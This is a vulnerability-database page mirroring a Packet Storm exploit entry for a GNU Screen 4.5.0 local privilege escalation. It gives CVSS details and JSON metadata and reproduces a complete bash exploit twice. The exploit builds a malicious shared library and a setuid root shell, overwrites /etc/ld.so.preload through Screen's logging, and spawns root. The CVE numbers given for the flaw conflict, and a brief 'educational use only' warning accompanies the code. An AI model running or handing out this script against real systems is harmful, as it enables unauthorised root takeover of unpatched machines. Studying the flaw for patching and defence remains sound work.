📄 GNU Screen 4.5.0 Local Privilege Escalation_PACKETSTORM:210183

7.8 / 10

HIGH

CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Description

GNU.............................................

Visit Original Source

Basic Information

ID PACKETSTORM:210183

Published Oct 6, 2025 at 00:00

Affected Product

Affected Versions ### GNU Screen 4.5.0 Local Privilege Escalation Exploit (CVE-2017-5618)

## 📌 Overview
Local privilege escalation exploit for GNU Screen 4.5.0 that hijacks shared library loading to gain **root access** via `ld.so.preload` manipulation.

## 🔧 Technical Details

Vulnerability: CVE-2017-5618

Type: Shared Library Hijacking via ld.so.preload

Affected: GNU Screen 4.5.0 exclusively

Fixed in: GNU Screen 4.6.0+

## 🎪 The Vulnerability Circus

CVE: 2017-5618 🎯

***The Bug: Screen 4.5.0 creates log files with DANGEROUS permissions***

***The Magic: We trick it into creating /etc/ld.so.preload that loads our malicious library***

***The Payload: Instant root shell! 🐚***

## Script 🗒️

```bash
#!/bin/bash
# exploit.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# CVE-2016-8781
# tested on debian jessie (8.6) with screen 4.5.
# 0xHackers - Darke
echo "~ gnu/screenroot ~"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
chown("/tmp/rootshell", 0, 0);
chmod("/tmp/rootshell", 04755);
unlink("/etc/ld.so.preload");
printf("[+] done!\n");
}
EOF
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
cat << EOF > /tmp/rootshell.c
#include <stdio.h>
int main(void){
setuid(0);
setgid(0);
seteuid(0);
setegid(0);
execvp("/bin/sh", NULL, NULL);
}
EOF
gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so"
echo "[+] Triggering..."
screen -ls
/tmp/rootshell

```
## Screenshots

> Checking Vulnerable Screen Version.

![Screen version detected](images/screen.png)

> Creating The File And Giving Required Permissions.

![Making](images/making.png)

> Root Access Gained.

![Root](images/root.png)

> Root shell achieved - full system control

## ⚠️ Warning Label

FOR EDUCATIONAL USE ONLY! ⚠️
Don't be a script kiddie - use this only on systems you own or have explicit permission to test.

## Tested On
TryHackMe KOTH Room - Food

{
    "lastseen": "2025-10-06T17:35:45",
    "description": "GNU.............................................",
    "published": "2025-10-06T00:00:00",
    "modified": "2025-10-06T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 GNU Screen 4.5.0 Local Privilege Escalation",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:210183",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2016-8781",
        "CVE-2017-5618"
    ],
    "sourceData": "### GNU Screen 4.5.0 Local Privilege Escalation Exploit (CVE-2017-5618)\n    \n    ## \ud83d\udccc Overview\n    Local privilege escalation exploit for GNU Screen 4.5.0 that hijacks shared library loading to gain **root access** via `ld.so.preload` manipulation.\n    \n    \n    ## \ud83d\udd27 Technical Details\n    \n    Vulnerability: CVE-2017-5618\n    \n    Type: Shared Library Hijacking via ld.so.preload\n    \n    Affected: GNU Screen 4.5.0 exclusively\n    \n    Fixed in: GNU Screen 4.6.0+\n    \n    \n    \n    ## \ud83c\udfaa The Vulnerability Circus\n    \n    \n    CVE: 2017-5618 \ud83c\udfaf\n    \n    ***The Bug: Screen 4.5.0 creates log files with DANGEROUS permissions***\n    \n    ***The Magic: We trick it into creating /etc/ld.so.preload that loads our malicious library***\n    \n    ***The Payload: Instant root shell! \ud83d\udc1a***\n    \n    \n    \n    ## Script \ud83d\uddd2\ufe0f\n    \n    ```bash\n    #!/bin/bash\n    # exploit.sh\n    # setuid screen v4.5.0 local root exploit\n    # abuses ld.so.preload overwriting to get root.\n    # CVE-2016-8781\n    # tested on debian jessie (8.6) with screen 4.5.\n    # 0xHackers - Darke\n    echo \"~ gnu/screenroot ~\"\n    echo \"[+] First, we create our shell and library...\"\n    cat << EOF > /tmp/libhax.c\n    #include <stdio.h>\n    #include <sys/types.h>\n    #include <unistd.h>\n    __attribute__ ((__constructor__))\n    void dropshell(void){\n        chown(\"/tmp/rootshell\", 0, 0);\n        chmod(\"/tmp/rootshell\", 04755);\n        unlink(\"/etc/ld.so.preload\");\n        printf(\"[+] done!\\n\");\n    }\n    EOF\n    gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c\n    rm -f /tmp/libhax.c\n    cat << EOF > /tmp/rootshell.c\n    #include <stdio.h>\n    int main(void){\n        setuid(0);\n        setgid(0);\n        seteuid(0);\n        setegid(0);\n        execvp(\"/bin/sh\", NULL, NULL);\n    }\n    EOF\n    gcc -o /tmp/rootshell /tmp/rootshell.c\n    rm -f /tmp/rootshell.c\n    echo \"[+] Now we create our /etc/ld.so.preload file...\"\n    cd /etc\n    umask 000 # because\n    screen -D -m -L ld.so.preload echo -ne  \"\\x0a/tmp/libhax.so\" \n    echo \"[+] Triggering...\"\n    screen -ls \n    /tmp/rootshell\n                \n    ```\n    ## Screenshots\n    \n    > Checking Vulnerable Screen Version.\n    \n    ![Screen version detected](images/screen.png)\n    \n    \n    > Creating The File And Giving Required Permissions.\n    \n    ![Making](images/making.png)\n    \n    \n    > Root Access Gained.\n    \n    ![Root](images/root.png)\n    \n    > Root shell achieved - full system control\n    \n    ## \u26a0\ufe0f Warning Label\n    \n    \n    FOR EDUCATIONAL USE ONLY! \u26a0\ufe0f\n    Don't be a script kiddie - use this only on systems you own or have explicit permission to test.\n    \n    ## Tested On\n     TryHackMe KOTH Room - Food",
    "sourceHref": "https://packetstorm.news/download/210183",
    "cvss": {
        "score": 7.8,
        "severity": "HIGH",
        "vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "version": "3.0"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "3.0",
            "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "attackVector": "LOCAL",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
        }
    },
    "href": "https://packetstorm.news/files/id/210183/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply